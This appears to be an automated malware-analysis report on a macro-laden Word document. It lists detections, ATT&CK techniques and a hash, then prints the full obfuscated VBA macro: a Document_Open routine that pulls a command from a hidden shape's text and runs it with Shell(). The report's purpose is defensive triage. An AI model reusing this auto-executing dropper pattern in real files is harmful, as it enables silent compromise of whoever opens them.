Verdict: MALICIOUS
Risk Score: 272
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1059.003 Windows Command Shell
The sample contains a Document_Open VBA macro that utilizes the Shell() function to execute a command. This command invokes cmd.exe with arguments that appear to construct and execute a PowerShell command. The PowerShell command is designed to download content from multiple URLs, suggesting it's a downloader for a second-stage payload. The presence of cmd.exe and PowerShell execution, along with the Shell() call, strongly indicates a malicious intent to compromise the system.
Heuristics (9)

- ClamAV: Doc.Malware.Dkah-6765199-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Dkah-6765199-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched lines in script:
    IjQsIiFGL = CByte(122056711)
    jZPVw = Array(tXVzssz, Interaction.Shell(iQRmh, HjDrF), wdYGmJrj)
    On Error Resume Next
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_open()
    On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high] SC_STR_POWERSHELL: Reference to PowerShell
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7593 bytes |

SHA-256: 6093b01cef2836d8b54165f145d9a5dc87cc6a7c110afd7e0245744da0877b00

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 163 of 244 identifiers look randomly generated (e.g. 'QQpVznZzlhph'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "QQpVznZzlhph"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
jQzCwjK = Atn(CXYAj)
AswKpqWk = CLng(pQJkfwKQ)
cwKGrdZZ = Cos(rZMsSsEt)
fREjH = CByte(cJmpvfErG)
YiiuAUlPF = CByte(206844254)
bwzQjl = CBool(288524834)
wavqMiir = iFmhFwtK
zGLjpac = 257697849
MoZPt = CByte(81013964)
On Error Resume Next
wwRBX = Atn(jhUjmT)
qKtFCBt = CLng(YqopzfhMs)
zAQhdUWWF = Cos(mHiHS)
cPDAPDw = CByte(ZGdLa)
zUcjnSMI = CByte(215801482)
ifvoMQL = CBool(216824264)
VCRJrhw = OIXqL
RFRfvTzPT = 229487652
SjHKpIu = CByte(319801746)
Set SdrSP = Shapes("QtLiaYCsZzI")
On Error Resume Next
IGdjMR = Atn(BOOZivo)
KEiDmR = CLng(brGXhl)
mXija = Cos(QVHzC)
udzAwZju = CByte(qrTjzwflZ)
jmzbruzV = CByte(251256537)
owiAFWicr = CBool(66264399)
wqIwfLAcF = jhJTuvBI
zEzzF = 300772287
SdaOC = CByte(308014917)
On Error Resume Next
rkFic = Atn(jzqUi)
CVckFzBw = CLng(WjDfR)
UjBEScFsu = Cos(lfHdsA)
JYBAwc = CByte(iTJAVD)
zKOOQ = CByte(273037046)
PFwdiU = CBool(128777385)
tUQVUt = QrWDm
zTEXqNm = 134707744
ObLwuSEXQ = CByte(53247228)
On Error Resume Next
NjiVGPEl = Atn(DZVqDd)
zjuPBQz = CLng(jaoFWojHi)
QZnBul = Cos(UljfwcPq)
vqJvhwi = CByte(ljbwOaXR)
XmEjwlJb = CByte(216706960)
NTlzYPBs = CBool(271926514)
nlUqEPOKq = KMNLF
lmzFAUA = 109773931
PziCjNi = CByte(226477689)
On Error Resume Next
cSzvpF = Atn(NPDiI)
rnUHvJ = CLng(LFFEZELTj)
snEiat = Cos(vFVRz)
sjXjWrLdm = CByte(KDXNu)
luiiDLv = CByte(29704418)
QtKMpni = CBool(86389929)
NYCUpb = hFjtfDj
ZUaiTq = 218492580
SGFzBRzS = CByte(210580366)
On Error Resume Next
qGGwmwW = Atn(AOtqSrqi)
sXMNZkFH = CLng(BviLIAip)
AAtpfWfS = Cos(dRwqLFqCw)
MQWAqGwbw = CByte(FtLdCqip)
sphGo = CByte(182854627)
jLjdVFDjd = CBool(164648070)
zDiivhd = kFToVbBzE
fJiYA = 153778194
rUTApiAc = CByte(76318884)
On Error Resume Next
asphI = Atn(ulzZrWn)
IYRnlw = CLng(zlnhu)
PzGTqFF = Cos(cIzIqNzqJ)
hmRAGzwh = CByte(EdGBzO)
imqFBQiSf = CByte(100235047)
fvlEHc = CBool(4511491)
HMPtJ = IvAWWHA
riLADlQEz = 136425617
fRmYzWdAz = CByte(44116818)
iQRmh = SdrSP.TextFrame.ContainingRange
On Error Resume Next
AuRLwS = Atn(jsKYvozb)
jwVqjlJNi = CLng(lZcTJLwOq)
vPQHTjl = Cos(mtUic)
rsNtkP = CByte(DhGjIHYB)
zZJEwU = CByte(210177200)
XAzJak = CBool(142924117)
wHcQz = iamrh
bKYNwY = 306623338
UYXWMAWjQ = CByte(177469939)
On Error Resume Next
UIYaaVB = Atn(oRjfmFb)
rEZEU = CLng(JAGAwXvGL)
bpDwApJ = Cos(WaSnGjwFJ)
wOfVCiw = CByte(TaYiZiF)
DzCfBC = CByte(305115784)
itXWuaB = CBool(286322745)
SJwpFm = wdVjasB
hrcBDicu = 135588262
nJGbd = CByte(298726406)
On Error Resume Next
VuRKzwSV = Atn(LsWmBH)
vkIDJzr = CLng(iMwURWsVD)
ZlQEwsFkt = Cos(faEOncU)
sSWVD = CByte(jmzzEr)
XSobVH = CByte(279015594)
PwZGRSDI = CBool(234876204)
pCmckbDh = XKuHjBGII
nRUdSd = 136934206
PmzddOQOp = CByte(210961418)
On Error Resume Next
NKFwQ = Atn(mavXsh)
JjnfhL = CLng(XEzFOw)
QjUKNll = Cos(SfVMz)
ZhnBucCr = CByte(wIOmjJLz)
SqWrbNiw = CByte(210066250)
OIKVM = CBool(182404273)
XLEUWZYDV = wzFsH
mtINiFaW = 328967227
vdXomCKim = CByte(338486537)
On Error Resume Next
TziiJDzj = Atn(ocoqc)
paPwGzMXK = CLng(QNhlBBX)
IDDIBjOU = Cos(tPtIfWVaP)
hdlHbYKs = CByte(PwDnEBiZm)
ZjilASIQ = CByte(97371437)
rMKmQpJW = CBool(316322619)
jqnYFAp = oHwzjtp
zrloS = 52589509
HwDoRXPrL = CByte(191522524)
On Error Resume Next
jrPJHi = Atn(aGKmnP)
jUPAZFqBv = CLng(ODUztraB)
QVMhXm = Cos(vnfPQLJa)
oizMAciv = CByte(vEKShOjl)
wVUnsOt = CByte(66633975)
WjRCt = CBool(300287369)
FJaoQo = RAchVdGQ
fpKFMBql = 123190904
ZMPPsKQBb = CByte(35128681)
On Error Resume Next
mTafvGB = Atn(jKTFR)
dBdkQuqrl = CLng(QlUmGEv)
dHYDJFD = Cos(ILuubE)
NlcBqM = CByte(hviwP)
mOvbO = CByte(280932042)
KVasXjw = CBool(249876715)
wqALaHB = DFQaZdV
qtiuQT = 210634957
cArLjdKN = CByte(112580955)
Const HjDrF = 0
On Error Resume Next
tZpUjjT = Atn(PXXwO)
sONaVuc = CLng(KPioEJ)
PisdW = Cos(jjJzc)
zkJbwI = CByte(iBlfjBvZ)
ZmsiJA = CByte(341586158)
iVrOIhEd = CBool(296970983)
cjBnljS = IdCLcbk
GXFzKzk = 131625519
bQXaThCna = CByte(120681056)
On Error Resume Next
zzSzALE = Atn(SFkmAKP)
hqThimmvX = CLng(CLSFkT)
mNAltCp = Cos(ZZNHBCWuI)
vcivN = CByte(WckJtL)
VQJNzP = CByte(51447905)
niqFMYnW = CBool(86942597)
RKEorurA = OQSfzNMs
spZiANHws = 272997304
niFXd = CByte(187428299)
On Error Resume Next
sAisKopf = Atn(qwRhCalvr)
jiGKi = CLng(oWlzO)
OBNwvVf = Cos(UEcZjwUtE)
whruJImq = CByte(jVREj)
OhPUGfPQ = CByte(338317225)
fCjihouS = CBool(324413070)
jkUrF = EVvWD
wsSPF = 167711643
IjQsIiFGL = CByte(122056711)
jZPVw = Array(tXVzssz, Interaction.Shell(iQRmh, HjDrF), wdYGmJrj)
On Error Resume Next
CBuuCFzt = Atn(iwdfTmLkQ)
jatdMAcQE = CLng(GbutFpQF)
JOziTddU = Cos(NJJukFzJI)
itaouHn = CByte(BjZiW)
wGkjs = CByte(168012419)
ijkDv = CBool(185685578)
qowwjs = sjZCajV
kSimDwd = 136314343
QjXzMq = CByte(249727793)
On Error Resume Next
sPYRqGMEs = Atn(zzJLY)
XdXpasz = CLng(izFYGKB)
HciRUVMo = Cos(zVssmzIRc)
EaASAQwj = CByte(BowiDQrhj)
JBQjz = CByte(173046404)
GjwAwHd = CBool(157774899)
GGJiBXmWm = Bnpbu
bJSlor = 21383949
iJMnqFjUK = CByte(40031720)
End Sub